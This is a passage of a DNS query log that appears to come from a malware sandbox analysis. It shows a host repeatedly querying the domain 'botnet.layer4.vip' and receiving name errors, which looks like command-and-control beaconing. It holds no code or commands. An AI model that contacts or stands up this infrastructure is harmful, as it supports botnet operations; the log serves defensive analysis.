                                  Apr 9, 2023 03:32:15.265240908 CEST8.8.8.8192.168.2.230x4397Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.353749037 CEST8.8.8.8192.168.2.230xe83eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.417644978 CEST8.8.8.8192.168.2.230xe83eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.441983938 CEST8.8.8.8192.168.2.230xe83eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.473325968 CEST8.8.8.8192.168.2.230xa2a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.512972116 CEST8.8.8.8192.168.2.230xa2a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.537524939 CEST8.8.8.8192.168.2.230xa2a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.592967033 CEST8.8.8.8192.168.2.230x3d86Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.663994074 CEST8.8.8.8192.168.2.230x38efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.687975883 CEST8.8.8.8192.168.2.230x38efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.727683067 CEST8.8.8.8192.168.2.230x38efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.743690968 CEST8.8.8.8192.168.2.230x5559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.759512901 CEST8.8.8.8192.168.2.230x5559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.783927917 CEST8.8.8.8192.168.2.230x5559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.808374882 CEST8.8.8.8192.168.2.230x5559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.832895994 CEST8.8.8.8192.168.2.230x5559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.864039898 CEST8.8.8.8192.168.2.230x4d7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.903713942 CEST8.8.8.8192.168.2.230x4d7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.919646025 CEST8.8.8.8192.168.2.230x4d7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.991265059 CEST8.8.8.8192.168.2.230x509fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.022576094 CEST8.8.8.8192.168.2.230x7fd3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.053832054 CEST8.8.8.8192.168.2.230x7fd3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.084851027 CEST8.8.8.8192.168.2.230x7fd3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.132591963 CEST8.8.8.8192.168.2.230xabc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.148444891 CEST8.8.8.8192.168.2.230xabc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.205259085 CEST8.8.8.8192.168.2.230xdfa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.254054070 CEST8.8.8.8192.168.2.230xdfa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.286227942 CEST8.8.8.8192.168.2.230x78ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.334930897 CEST8.8.8.8192.168.2.230x78ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.359299898 CEST8.8.8.8192.168.2.230x78ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.374705076 CEST8.8.8.8192.168.2.230x78ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.406410933 CEST8.8.8.8192.168.2.230x907aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.535252094 CEST8.8.8.8192.168.2.230x9dd3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.551126957 CEST8.8.8.8192.168.2.230x9dd3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.575258017 CEST8.8.8.8192.168.2.230x9dd3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.591145039 CEST8.8.8.8192.168.2.230xfcdeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.607184887 CEST8.8.8.8192.168.2.230xfcdeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.687381983 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.743083000 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.758603096 CEST8.8.8.8192.168.2.230xc29cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.782782078 CEST8.8.8.8192.168.2.230x5640Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.798543930 CEST8.8.8.8192.168.2.230x5640Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.838144064 CEST8.8.8.8192.168.2.230x5640Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.853712082 CEST8.8.8.8192.168.2.230x5640Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.942332983 CEST8.8.8.8192.168.2.230x2462Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.973817110 CEST8.8.8.8192.168.2.230x2479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:16.989381075 CEST8.8.8.8192.168.2.230x2479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.005060911 CEST8.8.8.8192.168.2.230x2479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.036314011 CEST8.8.8.8192.168.2.230x2479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.051785946 CEST8.8.8.8192.168.2.230x6d54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.075814962 CEST8.8.8.8192.168.2.230x6d54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.107173920 CEST8.8.8.8192.168.2.230x6d54Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.179529905 CEST8.8.8.8192.168.2.230xa436Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.206165075 CEST8.8.8.8192.168.2.230xa436Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.230321884 CEST8.8.8.8192.168.2.230xa436Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.270764112 CEST8.8.8.8192.168.2.230x4f67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.286339998 CEST8.8.8.8192.168.2.230x4f67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.317852020 CEST8.8.8.8192.168.2.230x4f67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.358195066 CEST8.8.8.8192.168.2.230xe5a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.422765017 CEST8.8.8.8192.168.2.230xe5a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.446942091 CEST8.8.8.8192.168.2.230xe5a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.487497091 CEST8.8.8.8192.168.2.230x94a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.519247055 CEST8.8.8.8192.168.2.230x94a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.534751892 CEST8.8.8.8192.168.2.230x94a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.550357103 CEST8.8.8.8192.168.2.230x1b76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.565881014 CEST8.8.8.8192.168.2.230x1b76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.581445932 CEST8.8.8.8192.168.2.230x1b76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.686285019 CEST8.8.8.8192.168.2.230xc6f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.726305008 CEST8.8.8.8192.168.2.230xc6f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.782857895 CEST8.8.8.8192.168.2.230x185cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.807416916 CEST8.8.8.8192.168.2.230x185cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.865817070 CEST8.8.8.8192.168.2.230xb3beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.905946016 CEST8.8.8.8192.168.2.230xb3beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:17.930505991 CEST8.8.8.8192.168.2.230xb3beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.019787073 CEST8.8.8.8192.168.2.230xbc44Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.044065952 CEST8.8.8.8192.168.2.230xbc44Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.060038090 CEST8.8.8.8192.168.2.230x937bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.139692068 CEST8.8.8.8192.168.2.230x937bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.170922995 CEST8.8.8.8192.168.2.230x42c0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.219394922 CEST8.8.8.8192.168.2.230x42c0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.234962940 CEST8.8.8.8192.168.2.230x42c0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.267110109 CEST8.8.8.8192.168.2.230x6b1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.315932035 CEST8.8.8.8192.168.2.230x6b1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.340513945 CEST8.8.8.8192.168.2.230x6b1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.412466049 CEST8.8.8.8192.168.2.230xc7caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.460988045 CEST8.8.8.8192.168.2.230x35d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.558538914 CEST8.8.8.8192.168.2.230x35d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.583244085 CEST8.8.8.8192.168.2.230x4584Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.614550114 CEST8.8.8.8192.168.2.230x4584Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.679331064 CEST8.8.8.8192.168.2.230xee38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.695259094 CEST8.8.8.8192.168.2.230xee38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.719959974 CEST8.8.8.8192.168.2.230xee38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.735820055 CEST8.8.8.8192.168.2.230xee38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.760149002 CEST8.8.8.8192.168.2.230xee38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.800501108 CEST8.8.8.8192.168.2.230x8f69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.816570044 CEST8.8.8.8192.168.2.230x8f69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.832501888 CEST8.8.8.8192.168.2.230x8f69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.848382950 CEST8.8.8.8192.168.2.230x8f69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.872832060 CEST8.8.8.8192.168.2.230xb7f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.897447109 CEST8.8.8.8192.168.2.230xb7f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.913413048 CEST8.8.8.8192.168.2.230xb7f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.979469061 CEST8.8.8.8192.168.2.230x4ba3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.019810915 CEST8.8.8.8192.168.2.230x4ba3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.106496096 CEST8.8.8.8192.168.2.230x71bdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.224029064 CEST8.8.8.8192.168.2.230x36f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.239947081 CEST8.8.8.8192.168.2.230x36f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.280128002 CEST8.8.8.8192.168.2.230x3be3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.295979977 CEST8.8.8.8192.168.2.230x3be3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.335899115 CEST8.8.8.8192.168.2.230x3be3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.351583004 CEST8.8.8.8192.168.2.230x1e20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.439780951 CEST8.8.8.8192.168.2.230x1e20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.455720901 CEST8.8.8.8192.168.2.230x9781Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.471584082 CEST8.8.8.8192.168.2.230x9781Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.511859894 CEST8.8.8.8192.168.2.230x9781Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.527698994 CEST8.8.8.8192.168.2.230x9781Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.543343067 CEST8.8.8.8192.168.2.230x5c29Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.574662924 CEST8.8.8.8192.168.2.230x5c29Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.590967894 CEST8.8.8.8192.168.2.230x5c29Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.631880999 CEST8.8.8.8192.168.2.230xabd0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.703953981 CEST8.8.8.8192.168.2.230xabd0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.729090929 CEST8.8.8.8192.168.2.230xc4fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.786582947 CEST8.8.8.8192.168.2.230xc4fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.802563906 CEST8.8.8.8192.168.2.230xc4fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.827533007 CEST8.8.8.8192.168.2.230xee9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.843858957 CEST8.8.8.8192.168.2.230xee9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.893244028 CEST8.8.8.8192.168.2.230xee9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.909684896 CEST8.8.8.8192.168.2.230xee9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.935355902 CEST8.8.8.8192.168.2.230x569bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.977386951 CEST8.8.8.8192.168.2.230x569bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.001868010 CEST8.8.8.8192.168.2.230x569bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.050182104 CEST8.8.8.8192.168.2.230xf1aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.098958969 CEST8.8.8.8192.168.2.230xf1aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.114761114 CEST8.8.8.8192.168.2.230xf1aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.154771090 CEST8.8.8.8192.168.2.230x8a80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.194947004 CEST8.8.8.8192.168.2.230x8a80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.234420061 CEST8.8.8.8192.168.2.230x8a80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.250092030 CEST8.8.8.8192.168.2.230x4691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.305864096 CEST8.8.8.8192.168.2.230x4691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.337383032 CEST8.8.8.8192.168.2.230x5f76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.353198051 CEST8.8.8.8192.168.2.230x5f76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.369424105 CEST8.8.8.8192.168.2.230x5f76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.410387039 CEST8.8.8.8192.168.2.230x5f76Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.435949087 CEST8.8.8.8192.168.2.230xec10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.480520010 CEST8.8.8.8192.168.2.230xec10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.505703926 CEST8.8.8.8192.168.2.230xec10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.523578882 CEST8.8.8.8192.168.2.230xec10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.547698021 CEST8.8.8.8192.168.2.230x9069Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.619221926 CEST8.8.8.8192.168.2.230x9069Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.707870960 CEST8.8.8.8192.168.2.230x74d3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.747405052 CEST8.8.8.8192.168.2.230x89cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.795804024 CEST8.8.8.8192.168.2.230x89cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.837407112 CEST8.8.8.8192.168.2.230x89cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.912754059 CEST8.8.8.8192.168.2.230x930aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.961374998 CEST8.8.8.8192.168.2.230x930aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.087430000 CEST8.8.8.8192.168.2.230x785bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.104146004 CEST8.8.8.8192.168.2.230x785bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.128089905 CEST8.8.8.8192.168.2.230x785bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.144243956 CEST8.8.8.8192.168.2.230x785bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.194884062 CEST8.8.8.8192.168.2.230x8c4eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.230376959 CEST8.8.8.8192.168.2.230x8c4eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.294334888 CEST8.8.8.8192.168.2.230x9c8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.318527937 CEST8.8.8.8192.168.2.230x9c8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.334461927 CEST8.8.8.8192.168.2.230x9c8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.350450039 CEST8.8.8.8192.168.2.230x19e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.430172920 CEST8.8.8.8192.168.2.230x19e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.534779072 CEST8.8.8.8192.168.2.230xa9c0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.574738979 CEST8.8.8.8192.168.2.230x75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.598886013 CEST8.8.8.8192.168.2.230x75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.671935081 CEST8.8.8.8192.168.2.230x549fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.687804937 CEST8.8.8.8192.168.2.230x549fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.719185114 CEST8.8.8.8192.168.2.230x549fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.735097885 CEST8.8.8.8192.168.2.230x549fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.782876968 CEST8.8.8.8192.168.2.230x3085Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.807537079 CEST8.8.8.8192.168.2.230x3085Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.847110987 CEST8.8.8.8192.168.2.230x63e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.911827087 CEST8.8.8.8192.168.2.230x63e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.936206102 CEST8.8.8.8192.168.2.230x63e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.007919073 CEST8.8.8.8192.168.2.230x6999Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.113099098 CEST8.8.8.8192.168.2.230x7f8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.153583050 CEST8.8.8.8192.168.2.230x2983Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.177758932 CEST8.8.8.8192.168.2.230x2983Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.209651947 CEST8.8.8.8192.168.2.230x2983Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.225183010 CEST8.8.8.8192.168.2.230x2983Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.241036892 CEST8.8.8.8192.168.2.230xe54bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.296989918 CEST8.8.8.8192.168.2.230xe54bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.321059942 CEST8.8.8.8192.168.2.230xe54bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
